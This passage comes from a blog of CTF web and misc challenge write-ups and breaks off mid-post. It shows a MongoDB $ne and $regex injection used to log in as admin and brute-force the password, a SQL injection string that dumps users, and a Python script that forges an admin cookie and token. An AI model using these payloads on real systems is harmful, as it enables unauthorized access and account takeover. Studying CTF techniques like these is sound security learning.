<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>52.196.116.69 very-secret-area-for-ctf.orange.tw</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. Access <a href="http://very-secret-area-for-ctf.orange.tw/">very-secret-area-for-ctf.orange.tw</a> and get the flag.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghzJ3tDoP8-voj9Nz7Lwy8Xk1tnFDF5xmp_848OhSB3q-T-yOVPFdgyst7EFOxm1qDG7r3k-iCR2mrtXl-WaZUm8gylH9LgpbxiAtvMt_LJ3RpLE0Src2V7c-lJsvq4mRqUcGVoTisU3Hh/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghzJ3tDoP8-voj9Nz7Lwy8Xk1tnFDF5xmp_848OhSB3q-T-yOVPFdgyst7EFOxm1qDG7r3k-iCR2mrtXl-WaZUm8gylH9LgpbxiAtvMt_LJ3RpLE0Src2V7c-lJsvq4mRqUcGVoTisU3Hh/s320/3.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="color: red;">Flag:</span> hitcon{hihihi, how 4re y0u today?}</b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com27tag:blogger.com,1999:blog-9154377361493966397.post-49419197873811205732016-09-05T11:32:00.001+07:002016-09-05T11:53:17.066+07:00MMA CTF 2nd 2016: Get the admin password! (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
Get the admin password!<br />
<a href="http://gap.chal.ctf.westerns.tokyo/">http://gap.chal.ctf.westerns.tokyo/</a><br />
<br />
You can use test:test</blockquote>
</blockquote>
<b>Solution: </b><br />
<br />
1. Trying injection payloads such as SQL Injection in the user/password fields shows no further information.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu6CNZwRNIo4EJJgEgOllMwhrmAYyQu2GV1Co4WRPqWpr8dBgcEnHpZ6RVd6AFPReqy14zJtCcKVcBk5wv80gA67fG8oaBWkeoo29FuGXvucdm5JT2X-nr7sK-x7YNJLnTKr0OnX1yXNzO/s1600/0.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu6CNZwRNIo4EJJgEgOllMwhrmAYyQu2GV1Co4WRPqWpr8dBgcEnHpZ6RVd6AFPReqy14zJtCcKVcBk5wv80gA67fG8oaBWkeoo29FuGXvucdm5JT2X-nr7sK-x7YNJLnTKr0OnX1yXNzO/s320/0.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
2. Fuzzing via Burp Suite Pro with the <b>Simple list: Fuzzing - SQL Injection</b> payload set on <b>user=admin&password=</b><span style="color: red; font-weight: bold;">[Fuzz]</span> gives some responses with a different length.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKVc2Ed5mP_mHCvdxRdOGMyCgxymhA6keNzJk7jWIgLwQqQB0v2AY9EBNZxo4kJbeifijsRyV3s1wWAKUHsN7uVwmEqgme36TIe6BBb7V5aqZyf65XImetAHbDH4Xb0R7RMvDan8skno0h/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKVc2Ed5mP_mHCvdxRdOGMyCgxymhA6keNzJk7jWIgLwQqQB0v2AY9EBNZxo4kJbeifijsRyV3s1wWAKUHsN7uVwmEqgme36TIe6BBb7V5aqZyf65XImetAHbDH4Xb0R7RMvDan8skno0h/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
3. Googling the keywords we have reveals that the backend database is <b>MongoDB</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgriq1iowGQInnNA2eZBqq4OcU5MnIcRMDjd2IRJpFrxtRYMHlY3ggSHPOA_LpdSueseQueCK3Da7zKV5LbJ0QaGLLjYK8cbrVXiQtzx9RTPIzqs4NilHqBXFkun3NskdaToMYldVX3pLbj/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgriq1iowGQInnNA2eZBqq4OcU5MnIcRMDjd2IRJpFrxtRYMHlY3ggSHPOA_LpdSueseQueCK3Da7zKV5LbJ0QaGLLjYK8cbrVXiQtzx9RTPIzqs4NilHqBXFkun3NskdaToMYldVX3pLbj/s400/2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. Trying <a href="https://www.idontplaydarts.com/2010/07/mongodb-is-vulnerable-to-sql-injection-in-php-at-least/">MongoDB Injection</a> with <b>user=admin&password[$ne]=1</b> successfully logs in as admin!</div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHwzxyWsgfPG3ZQPXkbIYFSa-RY-r4VKu3tLXEPH7M2q2_p0C8nflMLT_X5F6Ep2AibpXh2Jjq899IMBBdga2_3DEyICyZ8Lyou_KKn0NjdHsAplcT1Ub-h2kFbYKQhblwwbYJRyuly6We/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHwzxyWsgfPG3ZQPXkbIYFSa-RY-r4VKu3tLXEPH7M2q2_p0C8nflMLT_X5F6Ep2AibpXh2Jjq899IMBBdga2_3DEyICyZ8Lyou_KKn0NjdHsAplcT1Ub-h2kFbYKQhblwwbYJRyuly6We/s400/3.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. This challenge needs the admin password, so I try the <a href="https://docs.mongodb.com/manual/reference/operator/query/regex/">regex</a> operator to guess the admin's password, like <b>user=admin&password[$regex]=^TWCTF{<span style="color: red;">[Fuzz]</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yfItYmcAjiqwLcjK_Vhl12V11Z6VQ952rhnrbAXXb6b8ULQJiBltwSEQVB53aD3uEndnT9wH7hdwXPmK5PbtAXxMNcPn1d5lZgAGivJv6D6mSe91_WCowVhTUBU5xVZDXtOPSrR69JUU/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="333" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7yfItYmcAjiqwLcjK_Vhl12V11Z6VQ952rhnrbAXXb6b8ULQJiBltwSEQVB53aD3uEndnT9wH7hdwXPmK5PbtAXxMNcPn1d5lZgAGivJv6D6mSe91_WCowVhTUBU5xVZDXtOPSrR69JUU/s400/4.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. Set the payload type to Brute forcer with the character set from <b>$ python -c "import string; print string.printable"</b>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQUeP-ui4j70IuGNur_fjBwoWA7gJtPazEkglJrbw9tPjQBnSUgO-_EMdyEPnuPiPCN7NQEjHYgh0l1wFG-sMf6-yb3hIQUA_zhjQcys2vRDNKYaLBYcAZAyjLyughjhXoTBG2A0oz2AN3/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQUeP-ui4j70IuGNur_fjBwoWA7gJtPazEkglJrbw9tPjQBnSUgO-_EMdyEPnuPiPCN7NQEjHYgh0l1wFG-sMf6-yb3hIQUA_zhjQcys2vRDNKYaLBYcAZAyjLyughjhXoTBG2A0oz2AN3/s400/5.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
7. Set the <b>Grep - Extract</b> option, because if the character is correct the response is HTTP status code 302 Found redirecting to the index page.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6AfLre23XCaF1ziFLR3poQGVWyIV2WwdRomD8D817zw58g_4CoHmmlP-j5hjAHF2cca3-m-MO2Myi59hGjJHJ-F3CmuicWf7jiyreX9BMqNGcWgAV3e-k-0Fzk_u-uDKguLwX-BseaWgw/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6AfLre23XCaF1ziFLR3poQGVWyIV2WwdRomD8D817zw58g_4CoHmmlP-j5hjAHF2cca3-m-MO2Myi59hGjJHJ-F3CmuicWf7jiyreX9BMqNGcWgAV3e-k-0Fzk_u-uDKguLwX-BseaWgw/s400/6.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
8. Start the attack; the 1st character is "w" :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB-dn9aGyjyCki79tMTRcOu7Hyjh69lFrOpKDw7lVivST9cWaFPVcbXnXmxC64NOySOlBbKlwpfT7IFscQ6z71NqqIv7srngT_EXzV5fzdeW4Y_trHQtWM1401mHzV1S_qIKcJTGmq8yhC/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB-dn9aGyjyCki79tMTRcOu7Hyjh69lFrOpKDw7lVivST9cWaFPVcbXnXmxC64NOySOlBbKlwpfT7IFscQ6z71NqqIv7srngT_EXzV5fzdeW4Y_trHQtWM1401mHzV1S_qIKcJTGmq8yhC/s400/7.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
9. Repeat the fuzzing to find the remaining characters of the admin's password.</div>
<br />
<div class="separator" style="clear: both;">
<b>Flag: </b><span style="color: red;"><b>TWCTF{wasshoi!summer_festival!}</b></span></div>
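As an added example (not part of the original write-up), the Python below simulates how a PHP-style query-string parser turns <b>password[$ne]=1</b> into an operator object, why a login that passes that object straight into the query matches the admin document, and the string type check that stops it. The user store and the tiny matcher (equality, $ne, $regex only) are constructed stand-ins, not a real MongoDB driver.<br />

```python
import re
from urllib.parse import parse_qsl

# Constructed user store standing in for the challenge's MongoDB collection.
USERS = [
    {"user": "test", "password": "test"},
    {"user": "admin", "password": "TWCTF{constructed}"},
]


def parse_php_style(body):
    """Parse a form body the way PHP fills $_POST: 'password[$ne]=1' becomes
    {'password': {'$ne': '1'}}, i.e. a nested array instead of a string."""
    params = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", key)
        if m:
            params.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            params[key] = value
    return params


def matches(doc_value, cond):
    """Tiny subset of MongoDB matching: plain equality plus the two operators
    the write-up used, $ne and $regex."""
    if not isinstance(cond, dict):
        return doc_value == cond
    for op, arg in cond.items():
        if op == "$ne":
            if doc_value == arg:
                return False
        elif op == "$regex":
            if not isinstance(doc_value, str) or not re.search(arg, doc_value):
                return False
        else:
            raise ValueError("unsupported operator: " + op)
    return True


def find_one(query):
    for doc in USERS:
        if all(matches(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """Passes whatever structure arrived straight into the query, so an operator
    object like {'$ne': '1'} is treated as a condition rather than a password."""
    p = parse_php_style(body)
    doc = find_one({"user": p.get("user"), "password": p.get("password")})
    return doc["user"] if doc else None


def login_hardened(body):
    """Same login with the fix: both fields must be plain strings, so operator
    objects built from bracket parameters are rejected before any query runs."""
    p = parse_php_style(body)
    user, password = p.get("user"), p.get("password")
    if not isinstance(user, str) or not isinstance(password, str):
        return None
    doc = find_one({"user": user, "password": password})
    return doc["user"] if doc else None


if __name__ == "__main__":
    print(parse_php_style("user=admin&password[$ne]=1"))
    print(login_vulnerable("user=admin&password[$ne]=1"))  # admin
    print(login_hardened("user=admin&password[$ne]=1"))    # None
```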
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-55188919835405140672016-09-05T11:32:00.000+07:002016-09-05T11:32:46.714+07:00MMA CTF 2nd 2016: glance (Misc) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
I saw <a href="https://twctf7qygt6ujk.azureedge.net/uploads/glance.gif-994bd85cd3c2f37c1cd1d520a506abbbe459ac7dc2fedd39bf04c99a04abcb9f">this</a> through a gap of the door on a train.</blockquote>
</blockquote>
<b>Solution: </b><br />
<br />
1. Get the animated GIF file and go to <a href="http://gifmaker.me/exploder/">http://gifmaker.me/exploder/</a> to split the GIF into frames.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrvCVFH2Y1GrouZFGk2Py6Zg9xEsQvAvpgckUBOEbPSC0EAd6JO8RsgEqdTiLNtFCaYAYv64PXGTsgzfBphdGzIho15dGkN0Aw3isrK1fWPnj_nMsd38TUc3wKFuWX0uHyUYmfSe9GERSg/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrvCVFH2Y1GrouZFGk2Py6Zg9xEsQvAvpgckUBOEbPSC0EAd6JO8RsgEqdTiLNtFCaYAYv64PXGTsgzfBphdGzIho15dGkN0Aw3isrK1fWPnj_nMsd38TUc3wKFuWX0uHyUYmfSe9GERSg/s320/1.PNG" width="320" /></a></div>
<br />
2. I want to concatenate all the GIF frames, so I search Google and find a useful command: <a href="http://stackoverflow.com/questions/20737061/merge-images-side-by-sidehorizontally">http://stackoverflow.com/questions/20737061/merge-images-side-by-sidehorizontally</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirHRMmhe7wTifQ13hkkjBkCZNWX2tdWOzTmYg5yr_940DsIH_ZBSVjsUmIRh9ObzOsdqqHvFAO78zSlEC6fe0FQlDIKhHrtUz1AZWvSH2rpBwGRxoY-2BaM9a0E4YXzxBnSmCMmEdXAMSU/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirHRMmhe7wTifQ13hkkjBkCZNWX2tdWOzTmYg5yr_940DsIH_ZBSVjsUmIRh9ObzOsdqqHvFAO78zSlEC6fe0FQlDIKhHrtUz1AZWvSH2rpBwGRxoY-2BaM9a0E4YXzxBnSmCMmEdXAMSU/s400/3.PNG" width="400" /></a></div>
<br />
3. <b>convert +append *.gif out.png</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit_SBGk2snpbyW1Fqux-RxAhBvTaO2hZvnJR6QP1qlk47HUt1mp1piZeDOmlaod3FhWVN82h8F9fTFgZIDwLFuvtDhwuef7_hzhwSy5Fy4S_sOdpOS7qHFhalKMyxVwjzq8B-G6rV71_6l/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit_SBGk2snpbyW1Fqux-RxAhBvTaO2hZvnJR6QP1qlk47HUt1mp1piZeDOmlaod3FhWVN82h8F9fTFgZIDwLFuvtDhwuef7_hzhwSy5Fy4S_sOdpOS7qHFhalKMyxVwjzq8B-G6rV71_6l/s400/2.PNG" width="266" /></a></div>
<br />
<div class="separator" style="clear: both;">
<b>Flag: </b><span style="color: red;"><b>TWCTF{Bliss by Charles O'Rear}</b></span></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-73414660161201780812016-05-16T05:30:00.001+07:002016-05-16T06:13:25.382+07:00TU CTF 2016: Duckprint (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
See if you can steal the admin's duck print and validate it!</blockquote>
<blockquote class="tr_bq">
When calculating the SHA, leave the periods in</blockquote>
<blockquote class="tr_bq">
http://130.211.242.26:31337</blockquote>
</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. This challenge has 3 pages (Register, Generate, Validate). The goal is to calculate the admin's token and validate it to get the flag.<br />
<br />
2. Register with username "ichz"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-JWRdfmFNa2fR9qEV4JLcXrKypjVUTcJDeSxSZAfXRfbIW1C11S8UkqT4auxLXTkPk9Hb3iXQ3EiHEGpSZtXO8oj-iUgbrFTZjeC0GnWGG8SuUfw8zBbLfPdg-Yp9HMCwhkBupK5pSEAG/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-JWRdfmFNa2fR9qEV4JLcXrKypjVUTcJDeSxSZAfXRfbIW1C11S8UkqT4auxLXTkPk9Hb3iXQ3EiHEGpSZtXO8oj-iUgbrFTZjeC0GnWGG8SuUfw8zBbLfPdg-Yp9HMCwhkBupK5pSEAG/s400/4.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
3. Generating a token for my user shows my username, admin status = 0, token and generated token.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgEUuXori6ZiJZk843UXFR_kWA-K_uYpv8fsz4YyquIR9XGkA9NMvsALZ5lOrP0F5BXFct7gkpamVFMUzP86maEYAbWZADTMxgRFLuL10rQ2hi0PPXBdei2YU5-1BkJ4qMRAQKAcwDlqEu/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgEUuXori6ZiJZk843UXFR_kWA-K_uYpv8fsz4YyquIR9XGkA9NMvsALZ5lOrP0F5BXFct7gkpamVFMUzP86maEYAbWZADTMxgRFLuL10rQ2hi0PPXBdei2YU5-1BkJ4qMRAQKAcwDlqEu/s400/5.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
4. The generated token format is <b>sha256(b64(username) + "." + b64(cookie) + "." + b64(token))</b>. Where are the admin username and admin token?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. Viewing the source of the Generate page, I find a comment on line 24 showing the SQL query statement. Yes, it is vulnerable to SQL Injection!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ8taiHRXsYsK4p0IiKHHK9wrYHYIyZiGcNVRpInUMdMkfGQBBzLjz4wDZypULtbNwf7pAsW5t9cOojfi6EYbtFelCvHcwIuUU5io_XIOk6OTOdidu4O30MW_uadB_5lDA4Sy1cf3WwWIh/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJ8taiHRXsYsK4p0IiKHHK9wrYHYIyZiGcNVRpInUMdMkfGQBBzLjz4wDZypULtbNwf7pAsW5t9cOojfi6EYbtFelCvHcwIuUU5io_XIOk6OTOdidu4O30MW_uadB_5lDA4Sy1cf3WwWIh/s1600/2.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. Injecting a simple <b>' or '1'='1'-- -</b> returns all registered users, including the admin (DuckDuckGoose): admin status = 1, token = d4rkw1ng</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwg-yvRYzj3QUN1ayqWjlgP8VJNX0P-AGHAIZeINDVi8QZAUAntdow9Uz5UlsXO_BXx00ECIDXm5HmZNRlwb5gP7IgNtmQiectTXoYwIE9hC1Dob-mLgHPR7tkvDci7NPiDhhiBu9059Zi/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwg-yvRYzj3QUN1ayqWjlgP8VJNX0P-AGHAIZeINDVi8QZAUAntdow9Uz5UlsXO_BXx00ECIDXm5HmZNRlwb5gP7IgNtmQiectTXoYwIE9hC1Dob-mLgHPR7tkvDci7NPiDhhiBu9059Zi/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
7. Going to the Validate page gives a notice that I do not have permission to access it.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F8aLJNEwKx5yOzYpq8QVASyRN3cnOpSYdM8LS-iYBnvzEKmMcpckoTwmx4kMPj7fnHNg2KmNYr-5uKKWviaGvD2kaoL8dOOFI8Ua6UPh8d3SJMHSBclVqZ5mvY00CFjOyzLdhBXXz_SS/s1600/6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="258" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2F8aLJNEwKx5yOzYpq8QVASyRN3cnOpSYdM8LS-iYBnvzEKmMcpckoTwmx4kMPj7fnHNg2KmNYr-5uKKWviaGvD2kaoL8dOOFI8Ua6UPh8d3SJMHSBclVqZ5mvY00CFjOyzLdhBXXz_SS/s400/6.PNG" width="400" /></a></div>
8. In the cookies, I find <b>duck_cookie</b> is URL-encoded JSON set to <b>%7B%22username%22%3A%22<span style="color: red;">ichz</span>%22%2C%22admin%22%3A<span style="color: red;">0</span>%7D%0A</b>. I change the cookie to <b>%7B%22username%22%3A%22<span style="color: red;">DuckDuckGoose</span>%22%2C%22admin%22%3A<span style="color: red;">1</span>%7D%0A</b> with the Web Developer Tools in Google Chrome and access the page again.<br />
<br />
9. Back to the generated token format <b>sha256(b64(username) + "." + b64(cookie) + "." + b64(token))</b>: I now have the admin username and token from the SQL Injection vulnerability, so:<br />
<br />
<b>- sha256(b64('DuckDuckGoose') + "." + b64('%7B%22username%22%3A%22DuckDuckGoose%22%2C%22admin%22%3A1%7D%0A') + "." + b64('d4rkw1ng'))</b><br />
<b><br /></b>
<b>- sha256('RHVja0R1Y2tHb29zZQ==.JTdCJTIydXNlcm5hbWUlMjIlM0ElMjJEdWNrRHVja0dvb3NlJTIyJTJDJTIyYWRtaW4lMjIlM0ExJTdE.ZDRya3cxbmc=')</b><br />
<b><br /></b>
<b>- sha256: 29fb251184e9eadb3eb7a1790ecd1dd945525b1f50b56b261e01d9e2429cbe8b</b><br />
<b><br /></b>
10. Access to Validate page and submit generated token to get a flag.<br />
<br />
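The cookie and token construction of steps 8 and 9 can be scripted. The following Python is an added example and is not part of the original write-up: it rebuilds the URL-encoded JSON body of duck_cookie, the three base64 pieces and the SHA-256 token from the formula in step 9. The username and token values are the ones the write-up obtained through SQL injection; the cookie is hashed without the trailing %0A, matching the base64 string above.

```python
import base64
import hashlib
import json
from urllib.parse import quote


def make_cookie(username: str, admin: int) -> str:
    """Build the URL-encoded JSON body of duck_cookie.

    {"username":"ichz","admin":0}  ->  %7B%22username%22%3A%22ichz%22%2C%22admin%22%3A0%7D
    The server appended a newline (%0A) to the real cookie, but the token is
    computed over the value without it (see the base64 in the write-up).
    """
    body = json.dumps({"username": username, "admin": admin}, separators=(",", ":"))
    return quote(body, safe="")


def b64(s: str) -> str:
    """Standard base64 of a str, returned as str (e.g. 'DuckDuckGoose' -> 'RHVja0R1Y2tHb29zZQ==')."""
    return base64.b64encode(s.encode()).decode()


def token_preimage(username: str, cookie: str, token: str) -> str:
    """b64(username) + '.' + b64(cookie) + '.' + b64(token), the string that gets hashed."""
    return ".".join(b64(part) for part in (username, cookie, token))


def forge_token(username: str, cookie: str, token: str) -> str:
    """sha256 hex digest of the preimage: the value submitted on the Validate page."""
    return hashlib.sha256(token_preimage(username, cookie, token).encode()).hexdigest()


if __name__ == "__main__":
    # Values from the write-up: the target user and the token leaked via SQL injection.
    user, leaked_token = "DuckDuckGoose", "d4rkw1ng"
    cookie = make_cookie(user, admin=1)
    print("duck_cookie =", cookie)
    print("preimage    =", token_preimage(user, cookie, leaked_token))
    print("token       =", forge_token(user, cookie, leaked_token))
```

Set the forged duck_cookie value (with the %0A the server expects, if it checks for it) in the browser, then submit the printed token on the Validate page.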
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; margin-left: 1em; margin-right: 1em;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ0k04oJQ1oPfr9B9hLZKm2nx1Hdsfnz00cJGbQaB16g8XiF227_38NyaUiX1hJB6uxcseTwsoZA2o8ecNpqKVrM5IR78ZB6D1i_KTbQhiSg7o4VnBbn-UVr0jVqDIxZ_qG2UOdwlWCADx/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ0k04oJQ1oPfr9B9hLZKm2nx1Hdsfnz00cJGbQaB16g8XiF227_38NyaUiX1hJB6uxcseTwsoZA2o8ecNpqKVrM5IR78ZB6D1i_KTbQhiSg7o4VnBbn-UVr0jVqDIxZ_qG2UOdwlWCADx/s400/3.PNG" width="400" /></a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Flag: <span style="color: red;">TUCTF{Quacky_McQuackerface}</span></b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-29093840380509131232016-05-16T05:30:00.000+07:002016-05-19T23:30:26.381+07:00TU CTF 2016: Student Grades (Web) Write-up<b>Descriptions:</b><br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
We are trying to find out what our grade was, but we don't seem to be in the database...</blockquote>
<blockquote class="tr_bq">
Can you help us out?</blockquote>
<blockquote class="tr_bq">
http://104.199.151.39/index.html</blockquote>
</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. The phrase "in the database..." in the description makes me sure it is about SQL injection.<br />
<br />
2. The index page has an input for the name whose grade you want to show.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8kKzWAoJTyzSbCbCzevwrunyf8u07tHL6G6WVClsTw51X_ts_YkMMxlAaw9OOlb4pHlzbwcGvB3ZL3EtxD9cJE1FVHfTpGW-BXhwdlLV-AQc5Lt9fmFPeNCEJI3_vhlnrjQZkHmh51_gQ/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8kKzWAoJTyzSbCbCzevwrunyf8u07tHL6G6WVClsTw51X_ts_YkMMxlAaw9OOlb4pHlzbwcGvB3ZL3EtxD9cJE1FVHfTpGW-BXhwdlLV-AQc5Lt9fmFPeNCEJI3_vhlnrjQZkHmh51_gQ/s400/1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3. View the source of index.html and find some script.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
